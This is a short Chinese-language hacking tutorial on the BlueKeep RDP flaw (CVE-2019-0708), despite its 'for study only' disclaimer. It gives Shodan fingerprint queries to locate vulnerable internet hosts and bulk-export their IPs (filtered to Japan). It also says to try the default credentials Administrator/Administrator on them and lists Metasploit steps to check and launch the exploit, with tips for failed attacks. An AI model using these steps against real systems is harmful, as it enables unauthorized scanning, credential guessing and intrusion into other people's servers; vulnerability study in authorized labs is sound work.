#学习来源于泷羽sec。如有侵权请联系删除,本文仅用于学习交流,任何违法行为均无关!
原理及运用(查找并验证cve-2019-0708 漏洞)
存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS T120 的 控制结构体 ,但并未将指向该结构体的指针删除。
影响版本:
Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows Server 2003
Windows XP
1.使用shodan搜索(类似于指纹识别,去发现相应的漏洞特征)
shodan search --limit 10 --fields ip_str,port‘”\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00”’
2.使用以下代码进行查询(ip为1中搜索到的代码)
shodan host ip
3.用远程桌面来验证漏洞是否存在,然后尝试用弱口令:Administrator,Administrator,进行验证
4.打开kali自带的msfconsole工具进行检测
5.使用以下命令
search 0708
6.利用漏洞,use
7.show options
8.将文件拖入
9.check
攻击不成功的原因
(1)使用show options 看清payload ip端口是否填对
(2)使用show target (target只支持Windows7,sever这种)
这里的不进行演示,因为具有一定的敏感信息
资产批量下载并解析
parse(解析)和download(下载)这两个参数的演示
1.查看相应帮助文档
shodan download --help
2.download是自己搜索下载的漏洞ip文件名
shodan download 0708 --limit 10 '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"' country:jp
3.此时就下载好,并可以ls在目录中查看到
4.即可查看到自己下载好的详细ip
shodan parse --fields ip_str 0708
5.可以使用以下重定向为一个.txt文件
shodan parse --fields ip_str 0708>0708.txt